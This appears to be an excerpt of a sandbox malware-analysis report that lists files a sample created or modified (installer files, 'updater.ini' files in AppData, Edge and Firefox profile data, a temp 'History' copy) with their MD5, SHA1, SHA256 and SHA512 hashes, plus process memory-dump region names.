SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\e58bd35.msi

MD5 6c3dc29e2e491beed780cf04fd770560
SHA1 5babfacb2fd257326c6ebd2ff02019f9dbb480d8
SHA256 e426d8096da87dc44e070d7934b8eb7cd996a8a19491f57234c8a77fa26f5471
SHA512 d41c74f05e4a4fd45f6f2a386614125b2cd0abd302ffe75a4fa9c6e1adff1ae772fd45b880a7378f9021d1e14989884594c61ff363ea3391b56bbb33a97cc868

C:\Users\Admin\AppData\Roaming\BBWC\updater.ini

MD5 983440dc39200e47b259fee7becd7c18
SHA1 d0df8deda7ffc1a5ab2a7f12f1256375b2c8d3d5
SHA256 ad349c7068dfd86e041bc7e0263ac9ab8a591f44c8808431f754f8843fbca672
SHA512 9c3492dc776f39fc5197e8c5ddcafbad1ea256071a5d1071fb24854c08c1083b6101381ffb281a8c0108c98e246d93f1bd3b647b5c8e7a7a646bb85ebb771e27

C:\Config.Msi\e58bd34.rbs

MD5 47a8af4cbacf342ee28fe7d3288493b2
SHA1 d2b7719814e59f3d81ef76ac2f409687d280a94e
SHA256 0f78790dbd1dfde4026c2ff073b92090e722dc27e77e36f639fc1072beb47ed4
SHA512 918a0e226c5ae5e388df7f68a893d86bf3aa3bfa2e914f4ad49881b3d8490fe39276207eb29c6c2d62cfe5b134250adb314fc4fe87d2c7e5f94e2ae54690d22e

C:\Windows\Installer\MSIDD43.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/1120-293-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/1120-294-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/1120-295-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/1120-302-0x0000000005FD0000-0x0000000006324000-memory.dmp

memory/1120-306-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/1120-319-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2220-327-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2220-328-0x0000000004A40000-0x0000000004A50000-memory.dmp

memory/2220-329-0x0000000004A40000-0x0000000004A50000-memory.dmp

memory/2220-339-0x0000000004A40000-0x0000000004A50000-memory.dmp

memory/2220-341-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2496-349-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2496-350-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2496-360-0x0000000005B70000-0x0000000005EC4000-memory.dmp

memory/2496-361-0x00000000063D0000-0x000000000641C000-memory.dmp

memory/2496-362-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2496-364-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/4748-375-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4748-374-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/4748-376-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4748-386-0x00000000068C0000-0x000000000690C000-memory.dmp

memory/4484-387-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/4484-388-0x0000000005360000-0x0000000005370000-memory.dmp

memory/4748-398-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4748-399-0x00000000073C0000-0x00000000073F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Browser Extension\updater.ini

MD5 e4701de3b4b546216451d0c2fab72d3d
SHA1 1fd5e15715b2ae521f8b6637d666a10b9c9eda1a
SHA256 db55d386663f7ebf9870ae62c5a91fa737a15146713a502925130a0fe3ad9a18
SHA512 3008e4dd7004c921317be0d8139a47a94cdf03f3849fd40f1be243702caa350a1cf31982c4ae3ad7759da9e93400f9a475e7f598c6c7e0e162e5e7dc0f10b27d

C:\Windows\Installer\e58bd3a.msi

MD5 2d9e93d7efdd29091807122268863bab
SHA1 79620e2cb35232c0e50d6a94ff02655f2dea696b
SHA256 ab6b3a30d643bd1a807d4415e554a7e005c9320d1adbd0bfb4666cf1509c3078
SHA512 b06d0a75631e32d4d22f65a82deb5304decdafd981bafc3aef3aca8c77293d2520125311b771fcf9709315fa1294ec5a072da4568339091a2021a7eab3c8b6b3

C:\Config.Msi\e58bd39.rbs

MD5 e64a58c04a59c2cd2c0c3ed104b304ce
SHA1 7d8f38cfa842daf1341fb00517c28350ff5067f4
SHA256 13e4aca0bf2146cf309779bd58e3ec54e322ce2b96523fe5277a9bc7c89be6de
SHA512 9d9afbee1a2f184a6ee4093dadc8438d8fc47950c287b6ffdcec929833ea70f0613d925d5a58939aa4ebb7066db1c469d294dad694a3733dfcc280903b2e7498

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f3a33206eb7acd14adabf8bfac78ad66
SHA1 8ba8fc4409b69f54b0e575e1d9d49ba23fd64661
SHA256 61f91508c8a55791da27c6715a69ed98ed6207f400ed29f3cf7a78d3544f13ca
SHA512 0e83f332835655f7d6ea093adfbb62f3110ae986e2198c4c308a40566daf697c5c9c51d41391d09bd0e41b64d6a8b5699bb376c0b31d8fd6ecdf526eb3a2fe87

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 08b1bc3dd994f1c31cbec85dbc37b9f5
SHA1 c0d0c5aa628dc3e0e6ac54046345a2aeadd1fb74
SHA256 9474638cb94211d4fa4fb04cf212d6875e3b0c8c14422926b46bf5ef4a860e6c
SHA512 03a891627399d72e1f8fec92ad7b49695fac40dd80e93b2c18b829ff2771508b27cd976c17d94cfe948e0de5bf8d8f213102e6fee14a64de1eebb1ea992b153c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\6fb5895f-7fc9-4623-b9af-46748646b87f.tmp

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\122e0f12-4212-4ab2-9413-033f92742725.tmp

MD5 9eaf58857148485ed9846b65a576d4ce
SHA1 1e6db8bc3b0efd30328cde8fc87412f5d9e3149a
SHA256 56aa85396fb9d2fa37b9dbde8e094fd4ae60c9bfe88af10a2be387873a0e9cd5
SHA512 da39924f75851e734836e6e93a78b113f5825d6068be143d23a86d3365fe43ff15b930b9b34c542976bf60f30731cc4f269e8fe6b2da35781e17eb01d6a4568b

SHA256 c6396cfb3b709128efd82810adebff888f1af62d634f882abf05b09cde839b15
SHA512 385d88634055001bcb3526b0878f2a9adbc02b77e60d0c72a3cc9d81c0c8e59aa7ec04f15e7d80e34ec416c876631288171c8924ea91482b12f7b8ddf37bb2fc

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a66eef240ccf248e032da36c50f7cd1
SHA1 dce5cdd9f6c882bb454a217d5a6b3b471450ace0
SHA256 125c578f94df41f029649d67944c0dbff18b5dce2b4e1acb7a72b49b6a49f7dd
SHA512 8e65bf92b786a2a7cf2d8c8258019ca453f4c833d64c3aebd25a5c8c3fb260a398e09c3ab59f5e295fb218a9595600f93a402aec8dda9927ef1a202417ab7391

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 74087ba211d9d81446a0d09dbb26e7ca
SHA1 2ee1cee3beb96ff077369a512abd0630889f4f8e
SHA256 fac24c7cfa9369a7718271ca3228c0c3a59661b0c7e41c7b5487de3aa5acd3d8
SHA512 af57ff69202b8cc6e358ba980f4036653178605c8ab1f55d294f7dc782cd0111b62f10fb70324795113c76652579c68f0978787288d1550f4ea1aaa15883d9cd

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9b328849efb0e32db08924c40270471a
SHA1 9fea94826b87e3033ca6319dd281b6f3a3258a13
SHA256 f82642046640a09998c813c52a0f6c6a73e83d2797b9eecaf06d833af0354404
SHA512 841f97d5c0c231a3e98e7680e1118e44c8ff88a8a105c8977e214160476b709b31e2ed4f1f03e2068fe63e6b48b918b217784f7c4030f7595b829488cc13642e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 bd04a72b8c4ffa3156d21e6e191fa780
SHA1 e6b776dce5975d5431f2b7e39695ad5f8645ef4c
SHA256 c5f1a57ca78394a929238ac04ab8cffa0b00b1840bfa04bbac9eaeede50b4d4e
SHA512 94467a58fb74acec0f88be6dbcd7b8213d8facf67a91a33f04d34a1179891b43fe4911962d19801e9ae9e8298846d4e0506100dbd1fff038c43b4a505e11b939

C:\Windows\Temp\9c144f74-fa46-44e5-b2e8-0ddca8878734.tmp

MD5 4c4408ec294ac126c63d8d10c4c19c4e
SHA1 1bbc7e51b5e2af1721fc6625b8e4e912265cdf6d
SHA256 ee249fd2eec357d14115f56478607c8df29b80715ebe5e194a99c6b8974e06f2
SHA512 aa52f7becf1abccb5a456d23940166a21b7bc44916a3519e79f539ace119b023f01445664e1859a9e7bdc656a35a19aee301c93444a88c3bc97b1a5ff110ac94

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 79e57fb3bf4627caffaa22d3b286fcca
SHA1 b6c091e6341e7453f3a4529c9d1e86569b8e5d9d
SHA256 f2144fedb0ad51abfd6648620af72f952214330e7e5d76f29e6c98da6c2614d8
SHA512 dd5084f34667fcc5e412a60bd3565329bb02cef7b52f3d8106f833eee52c41f68ec87bb998102b794b82a0dcec23463738be22000d5952edeee4ac5c0ffd7583

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7c8f3e47592ed4493aa19e39ea1c53f7
SHA1 cc2f88ebae32cc0297d7cbc2542e3c8473bece4b
SHA256 0355e2e7bf4d555ab64349acba328c09262a3d0caf5f533b9ff904cdadaac4df
SHA512 701e4a7f7b6fc28e4f71c5a56f507a62054250ea108219e020bbbffbfa9924fb3e854122da9aa7e9b67588746912dd953724415f450c6b3a4dd821edeac645d9

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

MD5 0ab878834e3bf6b5834def3e40883c7c
SHA1 81e1daf48c638ed8511d137d8ad7b0caab1cd115
SHA256 98ce5a8c51ea23bdd76909a1c0a67871b4450600274d4c1e321788671d3f44e0
SHA512 c287ae52907b40691f265a9ec82e4f7c5481f15a545693430ce2736be3f1f33d501d51bf4d18fba79c3eae42cebab77733ca3a1691031a029383c470dcdcd889

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 209f571a14eece31960aacff9e638c73
SHA1 f74ec42f01ab8a64e84ae2d71bcf8c570fabfa1f
SHA256 52efff2ef755659ad93164e7400cd1d7196206a2b069c7fe1dae850072def832
SHA512 7f7302faa5070a3844f58d8c2dc982f2465cb4b3f2c3b7cfe3f7138a9628f7ceb9e3d5def2c436240dbed946754197df74c1ad41f2ecceab4fb9b7dbb45f50b3

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7eac20d778c303365c14929d3f3d38ad
SHA1 4f0e8949aabf53fcea12f0091320aa04c851761b
SHA256 17485722b7ef433c449b8a5a849fd6585987b1214971640143050b2211964238
SHA512 2f0899ab5bb6fa50eb428eb3bc32f3c9eb716a225661b4fd08b0c90a750c1499045f5ccb8b59c1ab9fa7f5adeffbaef72f3851bea1d37d7060ae97f77fa6d769

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 20b702597910281b5aaa031ed3d3dcc9
SHA1 9cb2b819c766cfa49fa377e0caeb3a9d92800007
SHA256 ad9dfa2dc20bae1557d96d71ceaa82b097214ee0d6ad71894dbef9459479eb13
SHA512 29791ece8a81059e078a521c44475cf7cecc3cbf9716eb57bb7b01bad6784ed65d67112cb04b185c9efe649f72b9f42a01a2c317c0bd45531d7bcc93ffebf7cb

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c8f966d41a8deb33c83a968bf88a7f13
SHA1 d63200a6250db4bcd44d448e28b13180fa57c91a
SHA256 1ef5f37826465b46932344a7243e55086a297fef595f689f61f87bc056cdad00
SHA512 2f62cfdff39bf74609a1f0db81708ef70954521c65e6bfbadcce5c78c1e585f1dbf3936c5500b34dd1e2b096be4b626fc6b2e12dc64af2a624dfa4334f40eb9b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 017449765cca4733ef3be5df63676642
SHA1 baf6bf700e17f85dae51626ba61d7b7c7c9ab04d
SHA256 0cceda6f66ad52bafd7ec78becb13a4e4cc2717b7a305064e91d8714c4bc6443
SHA512 0c775c460f25cad79331c5fd6502bc8bde26cdb40c7024aebbfb1f3da8493afbd32328375af37188dc5e62d4d2fcc91adfab261f42598d74a4d457dd2cae164e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 5a2191276c78a8737e7103d140db84b4
SHA1 1221d1bbae39f49114974ec6fe8557c9368cc5d1
SHA256 f58c56010cf7b8f6973fb0565b20eb6e590c2fddb4d1d4dfe8651cc653c65c4e
SHA512 5146bc50bc21bb85b76ae5921a437320d6240e683723c2b50f9488c820f8abc3d2bef9ea515c5e8ee9f0bd9c026270bb91d1ce3e1a0e292085197a3f11b7f339

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 725f3e0783d766a16b2f478388f756e6
SHA1 1d0f88aa5e62693408d1c716813a563e6f0fc88f
SHA256 b0aa9bdb87855649d4bc971e06f12e38a372718512715f0db168264375d7c3cf
SHA512 4febe0fdf4ccf04ed77c9f3f64640a231afbc74572a99c77af2e09211bc02cca381deda8cee9fdf760ad4ad9259c856d10f53ceeb4055b93f0aac1febd1ebb0c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e7f310d69e34111a1f3ce5eacc856a84
SHA1 c88296dc29fc11dcde9b403bbe6e1760d2c674f0
SHA256 89705ba1bfafebf68b0c7e73eacbe252ed9e6017d7b40a3e1721dc1452764c0f
SHA512 9651e734f5bb5bcd89c239fec60088b162366b86c138d58d58a8e6602ef10ffeeecb89c872427d2b8fa21fd0c147a5eb567fba67df8c7b5e0602627fa0074a78

C:\Windows\Temp\7b11c220-d6b9-4585-99a6-1648b521b24c.tmp

MD5 37a47b6f0520efe1a88add2d0afc0294
SHA1 5fe0685e87a2dac274174601d5e5c9a445a400a0
SHA256 8b29e905b7e15e85d80b8fa9507b9b73111196e5538202edb24d2bccb7ec5112
SHA512 3564959298a732620b355f37be3d77eea56340987703e3f78a5860d4e98811e19964dfdc6ec889ea61611ffe6a0910eb20b9f724c4d5f0c7c4f6dccccbb40cf3

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0b8d9fc0258ad61c92a2a27e3259c71c
SHA1 d828d0814a93c80778e3f7933ee5fb025f73e388
SHA256 c7e8e1531374d01fb5168ab7975c06fd191231fedd29ed620e500426dbeda8f6
SHA512 2ae9f6cc2bccafecbf279347642bb75e203e25abc40fa76bd02851dba923c746b7256bb9c8e91ea775f265be3085f383e4a39762db1114bac2dd9b45fb8d5ed7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7df768c6572bccf792f65987607685f8
SHA1 1804dcf1bc9b3f5cc2f98e067311011505d6e4e2
SHA256 ac6b0676abc359db9e4dd7abab710a435f58dff42eb03d00517c3a0d9812be69
SHA512 1c963a5a6605ae2792e9d0591815a45aeea7130d6570c0643dc6019a269f2f5bf1248852922e6e670fd0228e7c4e4ccaafe0a75baea26eb17394a8a319cf4a99

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\activity-stream.discovery_stream.json.tmp

MD5 650061210664f51cbe031553ed1e68e4
SHA1 393962fcaf20b7690a3a8aadf18bbb0a061b0c77
SHA256 db1dc6c71181d702f9a683044283f93eb243146a44d0bb4858da266a7f1b3b79
SHA512 2107fff47e2d9af4879fc74289c30f0a94b9e63a49958a26373bec40f9cf6b910864db0166dfd238de6a13256ac8b62c2c4ad904e89bc86819982f67d478803b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs.js

MD5 112a8d0a9dbb58193415a5ae0c9fc0e3
SHA1 f86b67091a7da61d447d4c7700e2a115527d80a0
SHA256 f60449013adde7c036654c4e46bebae37a6440cad3e94e1d50ab74b3e5f8e790
SHA512 b5a66162da0ce9646a13d2ee812c5221b471bbf5c65331424e90596e6467afb1f104f9d8fb20d8802c95170f11e4faf54135d90fd7d7f2b0fd613188227e1b4d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 e8a984ddd2c0199d10018f5d2729fc24
SHA1 a1337d52252f72f234ab2eef2f2beec6112184ed
SHA256 c226b9d251b379b9a14d3d9452fc3e2195a4f74f25b300d1af83becb1542de0a
SHA512 a0db85d69841fb9142340fba7d01e73cdb7ee54c92eda2728ef57de53cc3adc5d9dc6cc58046fda3508b5a1fdb94d3a7c89a00e4ee63baf51bd769410dabe34a

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 740c2efd6bb9dd4f58d946899df24485
SHA1 229b3a5d508a260cc4edfd5ddd42194362fb1e5e
SHA256 0799fe959df88f6dfe56f1402652cc8a265e722077549c93dc0ae7da644136ff
SHA512 8ccbbb49e64fe6f5a8b231f10b43631587e61cc8d97a078a4fb9258891692bc1611dec4ac27bc2273cc49ff5799b050d4a82e466cfb14bcaf28a66d827ffadcb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

MD5 4c7ea7a44d834b23cfadec258901b220
SHA1 4d70421e56369af4425ffb0d3792cc418eb64cf1
SHA256 18c0219a4180e636e43624bf779afa30cc674ad18e3b754a2abf9747a508d699
SHA512 90c16dec890a34e83d188e1cd16042e2c3d14a9bbba0920f4278765d794df9d74fc0e4e16ba48e70592c484ecbafbe7e6ff2f8385ba621e48d2530d8af0e62c4

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b400809a880823bfce821ebf74ede358
SHA1 b96c030887d8245d69c42e78493d219a65c3dcdb
SHA256 411bb22995b9b3cdf4bef3d2af30a7bc97dfcd6090b5a3c64600359f60e30889
SHA512 68872ccafe9672c5b395c28b2eb6fa862a70e848eb6345082ea35ce19c3e3c99a812d82f3df943f6db5f305b3567e76dbb6cbcef3084f21b11634b85a21ebe15

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5617231d0083f06da9ca54aee73d3866
SHA1 0cfc69484aacdbf440f20273be42cc5934479b64
SHA256 5fa4625d524fe0a43727ac076ea41f43ef4d2c0e59dda6c372a37fba6d85b622
SHA512 2d44df4d0e96da86d428ca02e42fc3935c1f223023b56df0981007cc5725571d5b622f5f68ac305389a40924fa0f8b6baf0dd0343ac6b54da31dcc4cb0824211

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 118c3715554c7aa256d9b38fd849d869
SHA1 0ccb8cc8a40c55add6af081844ea0a821c5a7634
SHA256 70008dd40e598f008c9aed96e4dc63e0c8ab9433549d1e4b01456d7dedf0d528
SHA512 92c55abcd2e40d7ba8da9bf074630ef581ff3a609627be8e1cdd25f9468897aad4f2d1bdabe4e2bab319f2fac39a332dab72798ab3c54cdafdb725e2cdb171c7

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\cache2\entries\577A586685F8D27BD5B926CE96132B84424D8EA4

MD5 83f5746b1c7f585057ad879d365248fe
SHA1 f332e6ca015ba22757198d2a4b8a90bb345f026b
SHA256 09a8aec5d64109dfff6f4f1290fdaf78ee70ae2b2fe2eb8f0e44802ef73f09b4
SHA512 05e0651260f3eba4bdf99948a106bde98088d6e48b655ef81423d2f6ddeab78d17b7b340248698187106c06ee4dcfd9dbbfafdcd4713cae295233a680e314381

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 d66ad1d2f8e758a02e789790d893223d
SHA1 37cd089cfee232b38ef5084e331deba54375531f
SHA256 0d708a0b5ce9b7a7dbf3f69dbc702880966d4dc9f64c26db74761739de7d2d71
SHA512 89d99e3c713c4032229d74bf206242554a692c82f6e9f32f3a5dc3d667435b11e77b412752b0789bd0114ef2846eb12bd6698fa0c1d74009ec5f7fa889e75332

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 11a936b1f1e1ca6418fe788912618507
SHA1 ae260ceab0b4f2100483535d5e25f3ea5cb2c0e4
SHA256 4bb0967161027d62d670350c60c1b5ff069e5eafe172cf63638ff0c3ff756f75
SHA512 dad40be54fac7a9606683f03038302c60add2ef5dfdb3322e460bf56cdce8373dee5c3880246e515fb937731519daf94a362591d8a3ecd7fa3dededed5481443

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

MD5 29fe6a0e25a4b69074fa51626a40680a
SHA1 d31ea62bda3345f600292a477ec7b35c457fbae0
SHA256 25d27f382daaa20664f20d95ad947b171b5ba6d7681761d431a0d23a395b291e
SHA512 336038d294edeb773479cb4e74fdeaf2663da5bb68fd41e9dcc1df1818ed1672544ff61f4b4e4eb7430b6258340ddedc56cac932cdfc4f390a5b6c9d575d07e2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 9ea7ee09a4ca5088310d578f8506d73a
SHA1 c17153d23d8fabd242bb25e1dffb688b3a2c6fbe
SHA256 94097669318cec76a77c669d4fce0e88e3aee2fdc7a3a541f84aadb0d177b327
SHA512 277c197a15c7b402b6e6ad30de141073d0c4471bc6b6b2c8f574a3ebf8c2a25dd33cd56cde4bd265e129d3d2385bd3d99ae161991e33455d7b97613be663b948

memory/6104-8140-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8143-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8156-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8157-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8158-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8159-0x0000000000400000-0x0000000001204000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tempAVSDTnlunsidO_T\2jQJv37iJ0lzHistory

MD5 650006254bbb65543d701f6d1fcd2c9f
SHA1 83768e418b037c844b80a229d7d3f40aba9f2ff6
SHA256 19de64ebf1886109fc0b73f430e6f9d69ed10987aaa6a8c7953f8d37a1f4a121
